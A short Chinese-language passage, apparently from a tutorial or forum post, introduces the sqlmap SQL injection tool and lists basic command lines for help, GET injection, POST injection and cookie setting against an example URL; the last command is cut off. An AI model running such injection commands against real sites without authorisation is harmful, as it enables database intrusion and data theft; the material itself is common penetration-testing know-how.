是sqlmap的脚本,解压后可直接运行列几个基本命令./sqlmap.py–h//查看帮助信息./sqlmap.py–u“http://www.anti-x.net/inject.asp?id=injecthere”//get注入./sqlmap.py–u“http://www.anti-x.net/inject.asp?id=injecthere”--data“DATA”//post注入./sqlmap.py–u“http://www.anti-x.net/inject.asp?id=injecthere”--cookie“COOKIE”//修改请求时的cookie./sqlmap.py–u